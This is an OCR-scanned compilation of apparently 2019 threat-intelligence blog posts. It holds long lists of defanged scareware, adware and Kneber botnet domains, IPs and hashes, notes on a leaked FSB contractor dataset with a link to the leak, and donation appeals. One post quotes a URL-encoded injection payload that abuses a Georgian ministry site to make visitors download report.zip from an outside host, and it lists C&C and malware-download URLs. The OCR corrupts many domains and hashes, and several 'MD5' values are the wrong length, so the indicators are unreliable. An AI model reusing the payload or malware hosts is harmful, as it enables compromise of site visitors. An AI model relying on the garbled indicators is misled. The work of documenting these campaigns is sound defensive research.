hxxp ://prenetsearch.com 
hxxp ://preved marketing.com 
hxxp://prizesforyou.com 
hxxp ://r2d 2adverising.com 
hxxp://popu pnukerpro.com 
hxxp://postcity.info, 
hxxp://prenetsearch.com, 
hxxp ://preved marketing.com, 
hxxp://prizesforyou.com, 
hxxp ://preservi ngtool.com 



hxxp://privaci dadconductor.com 
hxxp://pri vacidadgarantizada.com 
hxxp://pri vacidadyseguridad.com 
hxxp://pri vacyredder.com 
hxxp://pri vacywaker.com 
hxxp://pri vacywarrior.com 
hxxp://pri vatsicherer.com 
hxxp://protecaoconfi avel.com 
hxxp://proteccionasegu rada.com 
hxxp://proteccioncompleta.com 
hxxp://pro-dom.info 
hxxp://propotolok.info 
hxxp://pro-svet.info 
hxxp://r2d 2adverising.com 
hxxp://rad iosfera.net 
hxxp://proteccion imperial.com 
hxxp://protecteu rdinfo.com 
hxxp://protectionassu ree.com 
hxxp://protectionconue.com 
hxxp ://protectionded river.com 



hxxp ://protectiondenetsu rfage.com 

hxxp://proteggidati.com 

hxxp://protezioneesperta.com 

hxxp ://protezionefidata. com 

hxxp ://pu I ituraestrema.com 

hxxp ://pu raibashihosho.com 

hxxp ://pu raibashimaneja.com 

hxxp ://pu raibashitoshinrai.com 

hxxp ://rend imientototal.com 

hxxp ://rensanu.com 

hxxp://reparaerrores.com 

hxxp ://reparateu rdesysteme.com 

hxxp://repareja.com 
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hxxp://reparemenaces.com 
hxxp://repareya.com 
hxxp ://ri mu oviciarpame.com 
hxxp ://ri paraminacce.com 
hxxp://ri parasubito.com 
hxxp ://riservatezza net.com 



hxxp://safehardd rive, com 

hxxp://safepctool.com 

hxxp://rocktheads.com 

hxxp://rol ler-search.com 

hxxp://rombic-search.com 

hxxp://sea rchcolours.com 

hxxp://sel I moresoft.com 

hxxp://rocktheads.com 

hxxp://rol ler-search.com 

hxxp://rombic-search.com 

hxxp://rus-i nvest.net 

hxxp://rusnets.info 

hxxp://russia-post.com 

hxxp://sajruen.info 

hxxp://samson-pro.com 

hxxp://sauni.net 

hxxp://se7ensearch.com 

hxxp://safudaijoubu.com 

hxxp://salvaspaziosudisco.com 

hxxp://sansendommagement.com 



hxxp://sansi nfections.com 
hxxp://sayonarabaggu.com 
hxxp://sch ijfbewaker.com 
hxxp://sch ijfcontroleur.com 
hxxp://sch ijfredder.com 
hxxp://sch ijfruimteredder.com 
hxxp://sch utzderdaten.com 
hxxp://sch utzfuerpc.com 
hxxp://secretissi mosoft.com 
hxxp://secretopertutti.com 
hxxp://secretosasalvo.com 
hxxp://secretosegu ro.com 
hxxp://secu repccleaner.com 
hxxp://sefu nahimitsu.com 
hxxp://sekretessforsvarare.com 
hxxp://senzadoppioni.com 
hxxp://sh ingaidome.com 
hxxp://sh in raihogo.com 
hxxp://sel vascreensaver.com 
hxxp://sharpad verts.com 



hxxp://sh ivanetworking.com 
hxxp://shopshot.com 
hxxp://softwcs.com 
hxxp://sh in raipafomansu.com 
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hxxp://sh isutemudifensu.com 
hxxp://sichereranti virus.com 
hxxp://sichererschutz.com 
hxxp://sicherheitstool.com 
hxxp://si kkerbrukere.com 
hxxp://si kkerpcredskap.com 
hxxp://si kkersystem.com 
hxxp://si nataques.com 
hxxp://si nrrastros.com 
hxxp://si nsenales.com 
hxxp ://sistemaproteg ido.com 
hxxp://sistemu pyua.com 
hxxp ://sisutemuantei.com 
hxxp ://sisutemuorug urin.com 
hxxp ://skyddsprog ram.com 



hxxp://smittfri.com 
hxxp://solel unaantivirus.com 
hxxp://speichertool.com 
hxxp://spyguardpro.com 
hxxp ://spywaretaisaku master.com 
h xx p://stop bed reiging.com 
hxxp ://stopmi nacce.com 
hxxp://spywareisolator 
hxxp://storageprotector.com 
hxxp ://succesantivi rus.com 
hxxp://su peranonimo.com 
hxxp ://su rfforsure.com 
hxxp://su rfremover.com 
hxxp ://stratosearch.com 
hxxp://swiftcleaner.com 
hxxp ://tal lgrass-seach.com 
hxxp ://traffalo.com 
hxxp://traveltray.com 
hxxp ://sutoppu wirusu.com 
hxxp://syssau vegarde.com 



hxxp://systemerrorfixer.com 
hxxp://systemesansfaute.com 
hxxp://systemesansvi rus.com 
hxxp://systemhoover.com 
hxxp://systemsch ild.com 
hxxp ://tackanej virus.com 
hxxp://ti lforlatelig.com 
hxxp ://toolsicu ro.com 
hxxp ://topsal gantivirus.com 
hxxp://trasheraser.com 
hxxp ://trusselovervag ning.com 
hxxp ://trustedanti virus.com 
hxxp ://trusted protection.com 
hxxp ://trygg pcverktyg.com 
hxxp://tryg pcbruger.com 
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hxxp ://tu rnkeyantivirus.com 
hxxp ://u nidadessanas.com 
hxxp://usuarioproteg ido.com 
hxxp ://uti ledereparation.com 



hxxp://vitecmed ia.com 
hxxp://waytotheprofit.com 
hxxp://wi ndefender.com 
hxxp://wontu-search.com 
hxxp://uti I isateursur.com 
hxxp://vaktmotvi rus.com 
hxxp://vei I igheidsagent.com 
hxxp://vi renvernichter.com 
hxxp://vi rusbekaemper.com 
hxxp://viruskrakker.com 
hxxp://vi russperr.com 
hxxp://vi rusurimuva.com 
hxxp://vi rusvanger.com 
hxxp://virusvijand.com 
hxxp://vol umformatredskap.com 
hxxp://wi rusufinisshu.com 
hxxp://wi rusuk.com 
hxxp://wi rusukyua.com 
hxxp://a boutstat.net 
hxxp://freeora ngestats.com 



hxxp://newstat.net 
hxxp://a boutstat.net 
hxxp://freeora ngestats.com 
hxxp://g etmosales.com 
hxxp://newstat.net 
hxxp://sexprofit.com 
hxxp://ad2cash.net 
hxxp://admi rag roup.com 
hxxp://a ntispyexpert.com 
hxxp://antispyexpertpro.com 
hxxp://g etmosales.com 
hxxp://mal warecrash.com 
hxxp://adtraff.com 
hxxp://bucksbill.com 
hxxp://bu rnads.com 
hxxp://forceup.com 
hxxp://freetvnow.com 
hxxp://g etfreecar.com 
hxxp://adtraff.com 
hxxp://adzyclon.com 



hxxp://checkm8.com 

hxxp://adtraff.com 

hxxp://blessedads.com 

hxxp://prevedmarketing.com 

hxxp://checkm8.com 

hxxp://newbieadg uide.com 
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hxxp://blessedads.com 
hxxp://preved marketing.com 
hxxp://mal warecrashpro.com 
hxxp://bestad media.com 
hxxp://bestsearch net.com 
hxxp://blessedads.com 
hxxp://bucksbill.com 
hxxp://bu rnads.com 
hxxp://bu rnads.com 
hxxp://casi noaceking.com 
hxxp://cry ptdrive.com 
hxxp://newbieadg uide.com 
hxxp://blessedads.com 



hxxp://prevedmarketing.com 

hxxp://fi leprotector.com 

hxxp://forceup.com 

hxxp://forceup.com 

hxxp://freetvnow.net 

hxxp://fu lsearch.com 

hxxp://games.biz 

hxxp://lmamis.net 

hxxp://l ndivid-search.com 

hxxp://lnformati on-advertising, info 

hxxp://lnfyte.com 

hxxp://g etfreecar.com 

hxxp://g reyhathosting.com 

hxxp://netmed iagroup.net 

hxxp://nettu rbopro.com 

hxxp ://newbieadg uide.com 

hxxp://g etfreecar.com 

hxxp ://g reyhathosting.com 

hxxp ://netmed iagroup.net 

hxxp ://nettu rbopro.com 



hxxp://newbieadg uide.com 
hxxp://g reyhathosting.com 
hxxp://i nstallprovider.com 
hxxp://l ibresystm.com 
hxxp://loffersearch.com 
hxxp://mag icsearcher.com 
hxxp://mal ware-scan.com 
hxxp://manage-sea rch.com 
hxxp://megashopcity.com 
hxxp://mi ghtyfaq.com 
hxxp://misc-search.com 
hxxp://moneycometrue.com 
hxxp://money palacecash.com 
hxxp://my health-1 ife.org 
hxxp://myon I inefinance.com 
hxxp://mysu rvey4u.com 
hxxp://netmed iagroup.net 
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hxxp://nettu rbopro.com 
hxxp://newbieadg uide.com 



hxxp://newstat.net 

hxxp://newbieadg uide.com 

hxxp://blessedads.com 

hxxp://prevedmarketing.com 

hxxp://pcsu percharger.com 

hxxp://performanceopti mizer.com 

hxxp://popu pnukerpro.com 

hxxp://prizesforyou.com 

hxxp://traffalo.com 

hxxp://uniqads.com 

hxxp://popadprovider.com 

hxxp://popsmedia.com 

hxxp://popu pnukerpro.com 

hxxp://prevedmarketing.com 

hxxp://prevedmarketing.com 

hxxp://prizesforyou.com 

hxxp://proxi mogroup.com 

hxxp://adtraff.com 

hxxp://bucksbill.com 

hxxp://bu rnads.com 



hxxp://forceup.com 
hxxp://freetvnow.com 
hxxp://proxi mogroup.com 
hxxp://rocktheads.com 
hxxp://rol ler-search.com 
hxxp://rombic-search.com 
hxxp://se7ensearch.com 
hxxp://sea rch-expand.com 
hxxp://sea rch-the-prey.com 
hxxp://Cry ptdrive.com 
hxxp://Deuscleanerpay.com 
hxxp://Easybestdeals.com 
hxxp://E roticabsolute.com 
hxxp://Marketi ngdungeon.com 
hxxp://Med iatornado.com 
hxxp://Megashopcity.com 
hxxp://M ightyfaq.com 
hxxp://Mobi lesoftmarketing.com 
hxxp://Moneycometrue.com 
hxxp://Money palacecash.com 



hxxp://Cheap-auto-deals.com 
hxxp://Checkstockl ist.com 
hxxp://Chushok.com 
hxxp://Clever-at-search.com 
hxxp://Mobi lesoftmarketing.com 
hxxp://Mobi letops.com 
hxxp://Mobilorg.org 
hxxp://Moneycometrue.com 
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hxxp://sea rchcolours.com 
hxxp://sea rchmandrake.com 
hxxp://sea rchonline-ease.com 
hxxp://sea rchoperation.com 
hxxp://sea rchvirtuoso.com 
hxxp://sel I moresoft.net 
hxxp://sel I mysoft.net 
hxxp://mal ware-scan.com 
hxxp://sharpad verts.com 
hxxp://sh ivanetworking.com 
hxxp://sh ivanetworking.com, 



hxxp://deusclea neronline.com 
hxxp://sh ivanetworking.com 
hxxp://si mplesamplesearch.com 
hxxp://soccernet 
hxxp://bu rnads.com, 
hxxp://adtech.de 
hxxp://blessedads.com, 
hxxp://performanceopti mizer.com 
hxxp://softwa rep rofit.com 
hxxp://softwcs.com 
hxxp://stratosearch.com 
hxxp://tal lgrass-seach.com 
hxxp://theri ngtonesource.com 
hxxp://traffalo.com 
hxxp://traveltray.com 
hxxp://treeki ndsearch.com 
hxxp://u nicsearch.com 
hxxp://uniqads.com 
hxxp://upg-soft.net 
hxxp://vitecmed ia.com 



hxxp://wewi I lfind.com 
hxxp://win.com 
hxxp://wi ndefender.com 
hxxp://workhomecentre.com 
hxxp://zappinads.com 
hxxp://wi ndefender.com 
hxxp://wontu-search.com 
hxxp://workhomecenter.com 
hxxp://you rseeker.com 
hxxp://you rshopz.com 
hxxp://you rteacheronline.com 
hxxp://zappi nads.com 
hxxp://zooworld-search.com 

Related domains known to have participated in the 
campaign: 

hxxp://adtraff.com - 190.15.73.254 
hxxp://forceup.com - 190.15.73.254 
hxxp://burnads.com - 190.15.73.254 
hxxp://blessedads.com - 190.15.73.254 
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hxxp://prevedmarketing.com - 190.15.73.254 
hxxp://r2d2adverising.com - 190.15.73.254 
hxxp://shivanetworking.com - 190.15.73.254 
We'll post updates as soon as new developments take place. 

1. https://ddanchev.blo as Dot.com/2019/Q7/exposin a- 
ev a eniv-mikhavlovich-bo a achev.html 

2. https://ddanchev.blo as pot.com/2008/Q2/malicious- 
advertisin a -malvertisin a .html 

3. https://www.fbi. a ov/wanted/cvber/shaileshkumar- p.-iain 

4. https://www.fbi. a ov/wanted/cvber/b i orn-daniel-sundin 
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Assessing the Recently Leaked FSB Contractor Data - 
A Peek Inside Russia's Understanding of Social Net¬ 
work Analysis and Tailored Access Operations (2019- 
08-02 15:20) 

I've recently managed to obtain a copy of the recently leaked 
FSB contractor data courtesy of Ovlru $ and "Digital 

Revolution" and I've decided to take a closer look including 
an in-depth overview and discussion of the leaked data 

in the context of today's modern-driven Al-powered 
automated OSINT technologies in the broader context of the 




U.S Intelligence Community in particular the utilization of 
rogue TOR exit nodes for the purpose of intercepting 

and harvesting TOR exit node data within the Russian 
Federation including social-network analysis data-mining and 

possible "lawful surveillance" and "lawful interception" 
including possible data collection type of Tailored Access 
Operation campaigns launched by " Oday Technologies" 
and " SyTech". 

Sample Company Logo: 

Sample Company Logo: 
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Sample personal photos of the individuals behind 
"Oday Technologies" and "SyTech": 
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Sample Screenshots of the User-Interface behind the 
"Lawful Surveillance" and "Lawful Interception": 
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Sample Screenshots of the Rogue and Bogus Tor-Exit- 
Node Research Project: 
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Sample URLs involved in the campaign: 

hxxp://Oday.ru 

hxxp://sytech.ru 























Sample Telegram account involved in the campaign: 

hxxp://t.me/DlGlR3V Digital Revolution 

Sample Vkontakt account involved in the campaign: 

hxxp://vk. com/d lglr3v 

Sample Twitter account involved in the campaign: 

hxxp://twitter.com/dlglr3v 

hxxp://twitter.com/OvlruS 

Sample URL known to have participated in the 
campaign: 

hxxp://dlglr3v.net 

Related URL of the currently leaked data: 

https://mega.nz/ #F!3cOITaLI!jVUS _O7Q0opCHUPYgKlE _w 
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Cybertronics 



gOt Bitcoin? (2019-08-19 12:51) 

Dear blog readers, dare to take a moment of your precious 
time to check a venerable and recently proposed 

cyber security project investment including the opportunity 
to enter a Bold New World of Hacking and Information 

Security? Has the time come to set them straight? Keep 
reading. 

Check out this Onion - 

http://lkzihepprlhxtvbutjedoazbsqd4avmif 
hpjms3zuq7itceiu4qajwad.onion/ and do¬ 
nate today! 

Stay tuned! 
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DDanchev is for Hire! (2019-09-07 14:38) 

Looking for a full time threat intelligence analyst, cybercrime 
researcher, ora security blogger? 

Approach me at dancho.danchev@hush.com 
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Historical OSINT - The Russian Business Network Says 
"Hi" (2019-09-09 15:27) 

You know you're popular when "they" say "hi". 

It's 2009 and I've received a surprising personal email 
courtesy of guess who - The Russian Business Network 

showing off the actual ownership of the 
hxxp://rbnnetwork.com domain and basically saying "hi". It's 
worth pointing out that throughout 2008-2013 I've 
extensively profiled the activities including the customer 
activities of some of 

the most prolific customers and members of the infamous 
Russian Business Network also known as the RBN in 












the context of [l]blackhat SEO [2]iFrame and [3]input 
validation abuse across major [4]Web properties 

including 

[5]malvertising and various other [6]malware-serving 
and [7]client-side exploits serving campaigns including 

[8]money mule recruitment and [9]phishing 
campaigns the ubiquitous at the time [10]fake security 
software also known as scareware in a variety of post 
series. 

• Related post - [ll]Dissecting a Sample Russian 
Business Network (RBN) Contract/Agreement Through 
the 

Prism of RBN f s AbdAllah Franchise 

It's been a decade since I last profiled the most prolific and 
sophisticated market-leading bullet-proof hosting 

cybercrime enterprise - the Russian Business network which 
at the time was dominating the majority of campaigns 

that I was busy profiling with the help of fellow researchers to 
whom I owe a big deal of thanks for approaching me 

circa 2008-2013 namely [12]Jart Armin and [13]James 
McQuaid with whom I've been directly or indirectly keeping 

in touch throughout 2008-2013 for the purpose of offering 
quality research on the activities of the Russian Business 

958 

Network including their customers and fraudulent and 
malicious campaigns. 



• Related post - [14]Historical OSINT - Inside the 2007- 
2009 Series of Cyber Attacks Against Multiple 
Interna¬ 
tional Embassies 

Stay tuned and thanks for reaching out! 

Related Russian Business Network (RBN) Research: 

[ 15]I See Alive IFRAMEs Everywhere - Part Two 
[ 16]I See Alive IFRAMEs Everywhere 

[17] Bank of India Serving Malware 

[18] U.S Consulate in St.Petersburg Serving Malware 

[19] Syrian Embassy in London Serving Malware 

[20] CISRT Serving Malware 

[21] Compromised Sites Serving Malware and Spam 

[22] U.S Consulate St. Petersburg Serving Malware 

[23] Massive RealPlayer Exploit Embedded Attack 

[24] Malware Serving Exploits Embedded Sites as Usual 

[25] MDAC ActiveX Code Execution Exploit Still in the Wild 

[26] Yet Another Massive Embedded Malware Attack 

[27] Embedding Malicious IFRAMEs Through Stolen FTP 
Accounts 

[28] Over 100 Malwares Flosted on a Single RBN IP 



[29] Detecting and Blocking the Russian Business Network 

[30] Exposing the Russian Business Network 

[31] Go to Sleep, Go to Sleep my Little RBN 

[32] lnjecting IFRAMEs by Abusing Input Validation 

[33] RBN's Fake Account Suspended Notices 

[34] ZDNet Asia and Torrent Reactor IFRAME-ed 

[35] Russia's FSB vs Cybercrime 

[36] HACKED BY THE RBN! 

[37] Rogue RBN Software Pushed Through Blackhat SEO 

[38] Wired.com and History.com Getting RBN-ed 

[39] The Russian Business Network 

[40] Exposing the Russian Business Network 

[41] More CNET Sites Under IFRAME Attack 

[42] Embedded Malware at Bloggies Awards Site 

[43] Have Your Malware In a Timely Fashion 

[44] Geolocating Malicious ISPs 

[45] More High Profile Sites IFRAME Injected 

[46] The New Media Malware Gang - Part Four 

[47] Another Massive Embedded Malware Attack 



1. 

httDs://ddanchev.blo as pot.com/search/label/Blackhat%20SE 
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Join Me on Patreon Community! (2019-09-09 18:07) 

Dear blog readers, 

I decided to let everyone know that I've recently launched 

my own [lJPatreon Community Page with the idea 

to let everyone know that I'm currently busy crowd-funding a 
high-profile upcoming Cyber Security Investment 

Project - and I would love to hear from you more details about 
your thoughts regarding new Tier Features and 

whether or not you could make a possible long-term type of 
financial donation or sponsorship regarding my research 

and my security expertise. 

The current status of the project: 

- I'm currently busy soliciting additional input from 
colleagues regarding upcoming Tier Features 




- I'm currently busy reaching out to colleagues to possibly 
convert them to Patreon Sponsors 

- I'm currently busy working on a high-profile Security 
Podcast 

- I'm currently busy working on a high-profile Security 
Newsletter 

Has my research helped you or your organization in the past? 
Have you been a long-time blog reader? Have 

you learned something new? Did my active cybercrime and 
nation-state actor profiling helped you excel in your 

career path? Are you happy with what you're seeing? Dare to 
take a moment and refer a colleague or an organi¬ 
zation my personal blog including my [2]Patreon 
Community Page including a possible Patreon Sponsor 
request 

confirmation? 

Looking forward to hearing from you at - 
dancho.danchev@hush.com 

Enjoy! 

1. https://www.Datreon.com/bePatron7u = 15880233 

2. https://www.patreon.com/ddanchevl23 
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Fake NordVPN Web Site Drops Banking Malware 
Spotted in the Wild (2019-09-11 16:53) 

I've recently came across to a rogue NordVPN web site 
distributing malicious software potentially exposing NordVPN 

users to a multi-tude of malicious software further 
compromising the confidentiality availability and integrity of 
the 

targeted host to a multi-tude of malicious software. 

In this post, I'll provide actionable intelligence on the 
infrastructure behind the campaign and discuss in-depth 

the tactics techniques and procedures of the cybercriminals 
behind it. 

Sample malicious URL known to have participated in 
the campaign: 







hxxp://nord-vpn.club - 192.64.119.159; 2.56.215.159 

Sample malicious MD5s known to have participated in 
the campaign: 

MD5: 3c24aa2c26e3556194ffdl82a4dfaae5a41f 
MD5: 7d6c24992eff0d64fl9c78f05ea95ae44bc83afl 
MD5: d39c320c3a43873db2577b2c9c99d9bf2bdb285c 
MD5: d5ed3c70a8d7213edlb9al24bbcl942e2b8cfeea 
MD5: e89efde8ae72857bl542e3ae47f047c54b3d341a 
MD5: 59f511eale34753f41a75e05de96456ca28fl4a7 
MD5: 453c428edda0fc01b306cc6f3252893fce9763a7 
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Hilary kneber @hilarykneber • 16 Jan 2011 \/ 

d DANCHO DANCHEV Does anyone know ..Is there a way I can determine the 
exact date that Dancho Danchev began to "unfollow" me? 
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Historical OSINT - Georgian Justice Department and 
Georgia Ministry of Defense Compromised Serving 

Malware Courtesy of the Kneber Botnet (2019-09-11 
19:07) 

It's 2010 and I've recently came across to a compromised 
Georgian Government Ministry of Defense and Ministry of 

Justice official Web site spreading potentially participating in 
a wide-spread phishing and malware-serving campaign 

enticing users into interacting with the rogue U.S Intelligence 
and U.S Law Enforcement themed emails for the 

purpose of spreading and dropping malicious software on the 
targeted host's PC. 

Sample malicious URL known to have participated in 
the campaign abusing common Web Site redirection 
applica¬ 
tion vulnerability flaw: 

hxxp://www.mod.gov.ge/2007/video/movie.php?l = G &v= 

%20 %3E %20a %20href %20http %3A %2F %2Foffi- 

cialweightlosshelp.org %2Fwp-admin %2Freport.zip %20 
%3EDownload %20 %3C %2Fa %3E %20script %3Ewin- 

dow.OPEN %20http %3A %2F %2Fofficialweightlosshelp.org 
%2Fwp-admin %2Freport.zip %20 %3C %2Fscript %3E 

%20 #05184916461921807121 
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Related malicious URLs known to have participated in 
the campaign: 

hxxp [//official weightlosshelp.org/wp-admin/report.zip 

Spread URL found within the config: 

hxxp://www.adventure-center.net/upload/x.txt - 195.70.48.67 

Related compromised malicious URLs known to have 
participated in the campaign: 

hxxp://new.justice.gov.ge/files/Headers/in.txt 












hxxp://new.justice.gov.ge/files/Headers/fresh.txt 

hxxp://new.justice.gov.ge/files/Headers/rollersl.php 

Related MD5s known to have participated in the 
campaign: 

MD5: d0c0a2e6b30f451f69df9e2514ba36f2 
MD5: 974a4a516260a4fafb36234897469013 
MD5: ecb7304f838efb8e30a21189458b8544 
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MD5: 81b3bff487fc9a02el0288114fc2b5be 

MD5: 234523904033f8dc692c743cbcf5cf2b 

MD5: e2fffaffcl064d24e7ea6bab90fd86fc 

MD5: 5941c9b5bd567c5baaecc415e453b5c8 

MD5: 0ff325365fld8395322dlef0525f3blf 

MD5: 4437617b7095ed412f3c663d4b878c30 

MD5: eb66a3ell690069b28c38cea926b61d2 

MD5: 2b7e4b7c5faf45ebe48df580b63c376b 

Known to have participated in the campaign are also 
the following two domains part of the Hilary Kneber 

botnet: 

hxxp://dnicenter.com - Email: abuseemaildhcp@gmail.com 
hxxp://dhsorg.org - Email: hilarykneber@yahoo.com 



Related malicious download location URLs known to 
have participated in the campaign: 

hxxp://www.zeropaid.com/bbs/includes/CYBERCAFE.zip 

hxxp ://rapi dshare. com/files/318309046/CYBERCAFE.zip.html 

hxxp://www.sendspace.com/file/fmbt01 

hxxp ://h kcaregroup.com/modlogan/MI LS0FT.zip 

hxxp ://rapi dshare.com/fi les/320369638/M ILSOFT.zip.html 

hxxp ://fcpra.org/down I oads/M I LSOFT.zip 

hxxp://fcpra.org/downloads/wi nupdate.zip 

hxxp://www.sendspace.com/file/tj373l 

hxxp://mv.net.md/update/update.zip - 195.22.225.5 

hxxp://www.sendspace.com/file/7jmxtq 

hxxp ://mv. net. md/dsb/DSB.zip 

hxxp://www.sendspace.com/file/rdxgzd 

hxxp ://ti mi ngsolution.com/Doc/BU LLETIN.zip 

hxxp://www.sendspace.com/file/goz3yd 

hxxp://d nicenter.com/docs/report.zip 

hxxp://dhsorg.org/docs/instructions.zip - 222.122.60.186; 
222.122.60.1 

hxxp://www.sendspace.com/file/h96uhl 
hxxp ://depositfi Ies.com/files/xjlwvamc4 



hxxp://tiesiog.puikiai.lt/report.zip 

hxxp://somashop.lv/report.zip 

hxxp://www.ch ristianrantsen.dk/report. zip 

hxxp://enigmazones.eu/report.zip 

hxxp://www.ch ristianrantsen.dk/report.zip 

hxxp://enigmazones.eu/report.zip 

hxxp://gnarus.mobi/media/Europeanllnion 
MilitaryOperations _EN.zip 

hxxp ://q ui meras.com. mx/media/Europea nil n ion 
_MilitaryOperations_EN.zip - 66.147.242.169 

Related malicious and fraudulent domains known to 
have participated in the campaign: 

hxxp://dhsinfo.info - 218.240.28.34 

hxxp://greylogic.info - 218.240.28.34; 218.240.28.4 

hxxp://intelfusion.info - 218.240.28.34 
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hxxp://greylogic.org - 222.122.60.1 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: 8b3a3c4386e4d59c6665762f53e6ec8e 
MD5: 5fb94eef8bd57fe8e20ccc56e33570c5 


MD5: 28c4648f05f46a3ec37d664cee0d84a8 



Once executed a sample malware phones back to the 
following C &C server IPs: 

hxxp://from-us-with-love.info - 91.216.141.171 

hxxp://from-us-with-love.info/i mg I ov/zmpt4d/n 16vl8.bin 

hxxp://vittles.mobi - 174.132.255.10 

hxxp://nicupdate.com - 85.31.97.194 

Related malicious and fraudulent IPs known to have 
participated in the Hilary Kneber botnet campaign: 

hxxp://5 8.218.199.239 

hxxp://59.53.91.102 

hxxp ://60.12.117.147 

hxxp 7/61.2 35.117.71 

hxxp 7/61.2 35.117.86 

hxxp 7/61.4.82.216 

hxxp 7/193.104.110.88 

hxxp 7/95.169.186.103 

hxxp 7/2 2 2.12 2.60.186 

hxxp 7/217.23.10.19 

hxxp 7/8 5.17.144.7 8 

hxxp7/200.106.149.171 

hxxp7/200.63.44.192 



hxxp://200.63.46.134 
hxxp ://91.2 06.2 31.189 
hxxp 7/124.109.3.135 
hxxp 7/61.61.20.134 
hxxp 7/91.2 06.2 01.14 
hxxp 7/91.2 06.2 01.2 2 2 
hxxp 7/91.2 06.2 01.8 
hxxp 7/216.104.40.218 
hxxp 7/69.197.128.203 

Related malicious and fraudulent domains known to 
have participated in the Hilary Kneber botnet 
campaign: 

hxxp7/l 23.30d5546ce2d9ab37.d99q.cn 

hxxp7/d99q.cn 

hxxp7/524ay.cn 

hxxp 7/adcou nters.net 

hxxp7/adobe-config-s3.net 

hxxp 7/my warworld.cn 

hxxp7/aqaqaqaq.com 

hxxp7/avcheckerl23.com 

hxxp7/bizelitt.com 



hxxp://biznessnews.cn 
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hxxp://bizuklux.cn 

hxxp://fcrazy.com 

hxxp://fcrazy.eu 

hxxp://boolred.in 

hxxp://brans.pl 

hxxp://britishsu pport.net 

hxxp://bulkbin.cn 

hxxp://chaujoi.cn 

hxxp://checkvirus.net 

hxxp://ch inaoilfactory.cn 

hxxp://ch ris25project.cn 

hxxp://cl ientl58.faster-hosting.com 

hxxp://cwbnewson I ine.cn 

hxxp://cxzczxccc. com.cn 

hxxp://dasfkjsdsfg.biz 

hxxp://dia2.cn 

hxxp://d igitalinspiration.e37z.cn 
hxxp://dol banov.net 



hxxp ://dolcegabbana. djbormand.cn 
hxxp://dj bormand.cn 

hxxp://download.sttcounter.cn - 61.61.20.134; 211.95.78.98 

hxxp ://sttcou nter.cn 

hxxp://dred3.cn 

hxxp://dsfad.in 

hxxp://e37z.cn 

hxxp://e58z.cn 

hxxp ://electrofu nny.cn 

hxxp ://electromusi cnow.cn 

hxxp://elsemon.cn 

hxxp ://fcrazy. info 

hxxp ://fi lemarket.net 

hxxp://flo5.cn 

hxxp://footballcappers.biz 

hxxp://fobsl.cn 

hxxp://forum.d99q.cn 

hxxp://gamno6.cn 

hxxp://gidrasil.cn 

hxxp ://g ifts2010.net 



hxxp://ginmap.cn 
hxxp://giopnon.cn 
hxxp://gksdh.cn 
hxxp://glousc.com 
hxxp://g nfdt.cn 
hxxp://g old-smerch.cn 
hxxp://g olden mac.cn 
hxxp://g oogle.maniyakat.cn 
hxxp://man iyakat.cn 
hxxp://g reenpl.com 
hxxp://g rizzli-counter.com 
hxxp://grobinl.cn 
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hxxp://inpanel.cn 

hxxp://itmasterz.org 

hxxp://iuylqb.cn 

hxxp://kaizerr.org 

hxxp://keepmeu pdated.cn 

hxxp://khalej.cn 

hxxp://ki mosimotuma.cn 



hxxp://klaikius.com 

hxxp://klitar.cn 

hxxp://kolordat482.com 

hxxp://kotopes.cn 

hxxp://liagand.cn 

hxxp://love2coffee.cn 

hxxp://majorsoftwareupdate.info 

hxxp://marcusmed.com 

hxxp://mcount.net 

hxxp://mega-cou nter.com 

hxxp://monstersoftware.info 

hxxp://morsayn iketamere.cn 

hxxp://myda ilymail.cn 

hxxp://my newworldorder.cn 

hxxp://newsdown loads.cn 

hxxp://nit99.biz 

hxxp://n rn.fcrazy.com 

hxxp://n malodbp.com 

hxxp://not99.biz 

hxxp://on line-counter.cn 



hxxp://pedersii.net 

hxxp://piramidsoftware.info 

hxxp://popu pserf.cn 

hxxp://qaqaqaqa.com 

hxxp://qaqaqaqa.net 

hxxp://qbxql6.com 

hxxp://red I inecompany.ravelotti.cn 

hxxp://ravelotti.cn 

hxxp://relevant-i nformation.cn 

Related Hilary Kneber botnet posts: 

[1] Keeping Money Mule Recruiters on a Short Leash 

[2] Standardizing the Money Mule Recruitment Process 

[3] Dissecting the Exploits/Scareware Serving Twitter Spam 
Campaign 

[4] Koobface Botnet Starts Serving Client-Side Exploits 

1. https://ddanchev.blo as pot.com/2009/ll/keepin g -mone v- 
mule-recruiters-on-short.html 

2. https://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-muie-recruitment.html 

3. https://ddanchev.blo as pot.com/2010/Q6/dissectin a- 
exploitsscareware-servin a .html 














4. https://ddanchev.blo as pot.com/20Q9/ll/koobface-botnet- 
starts-servin a -cllient.html 
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I'm Back! (2019-09-17 09:56) 

Dear blog readers - it's been a while since I've last posted a 
quality update following my [l]disappearance and 






possible kidnapping attempt circa 2010 but as many of 
you have noticed I've recently published a variety of 

research and CYBERINT type of articles in a variety of areas 
which means that I'll be shortly returning to the usual 

blogging rhythm successfully publishing a quality set of 
research articles anytime soon. I've also wanted to let you 

know that I've recently launched an extremely popular News 
Portal called [2]Unit-123 offering practical advice to 

the U.S Intelligence Community including Cyber Warriors and 
Cyber Warfare experts including a Cyber Security and 

Hacking Community called [3]Offensive Warfare including 
a Bitcoin soliciting bid on the Dark Web for the upcoming 

launch of a proprietary custom-based Virtual Reality Social 
Network for Hackers and Security Experts called 

[4]Cybertronics 

(dzxvmqrl3rjxbzuer6vv5ejahniz2nefqxfmwspfmvzjo4x 
xzm7n4xad.onion) including the usual 

interview spree in an attempt to land a permanent job 
position as I've been working on a variety of personal and 

proprietary Security and OSINT projects. 
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• Are you interested in having me speak at your event? Are 
you interested in inviting me to join a classified and 
potentially sensitive event or research group? Are you 
interested in becoming a writer at this blog? Are you 



interested in advertising at this blog? Feel free to approach 
me - disruptive.individuals@gmail.com 

Consider going through some of my most recently 
published research: 

• [5]Exposing Iran's Most Wanted Cybercriminals - FBI Most 
Wanted Checklist - OSINT Analysis 

• [6]Exposing Yet Another Currently Active Fraudulent and 
Malicious Pro-Flamas Online Infastructure 

• [7]Flashpoint Intel Official Web Site Serving Malware - An 
Analysis 

• [8]Historical OSINT - "I Know Who DDoS-ed Georgia and 
Bobbear.co.uk Last Summer" 

• [9]Historical OSINT - A Peek Inside The Georgia 
Government's Web Site Compromise Malware Serving 
Campaign 

- 2010 

• [10]Historical OSINT - Profiling a Rogue and Malicious 
Domain Portfolio of OEM-Pirated Software 

• [ 11 ]Historical OSINT - Able Express Courier Service Re- 
Shipping Mule Recruitment Scam Spotted in the Wild 

• [ 12]Historical OSINT - Global Postal Express Re-Shipping 
